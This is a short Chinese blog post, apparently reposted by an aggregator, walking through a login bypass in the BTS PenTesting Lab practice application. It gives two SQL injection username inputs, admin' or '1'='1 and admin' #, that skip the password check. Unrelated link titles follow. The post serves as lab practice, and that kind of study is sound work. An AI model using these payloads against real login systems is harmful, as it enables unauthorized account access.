BTS PenTesting Lab-Injection-sql injection-authentication bypass

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BTS PenTesting Lab-Injection-sql injection-authentication bypass相关的知识,希望对你有一定的参考价值。

这是一个登陆认证的绕过。

注意:如果点击登陆出现404,请在login.php源码中搜索action,将其值改为login.php。

源码分析:/btslab/login.php

技术分享

根据第9行,可构造绕过密码认证。

第一种   username:admin‘ or ‘1‘=‘1

            password:随意。

第二种   username:admin‘ #

            password:随意

欢迎补充。

以上是关于BTS PenTesting Lab-Injection-sql injection-authentication bypass的主要内容,如果未能解决你的问题,请参考以下文章

markdown 移动应用Pentesting研讨会的东西

独行巨蟹:BTS2.0那些事儿

BTS运动生物力学系列—BTS SMART Analyzer生物力学动作分析模块

华为BTS312和3012的区别?

如何在 Informix 中创建 BTS 索引

BTS3900和DBS3900有啥区别?谢谢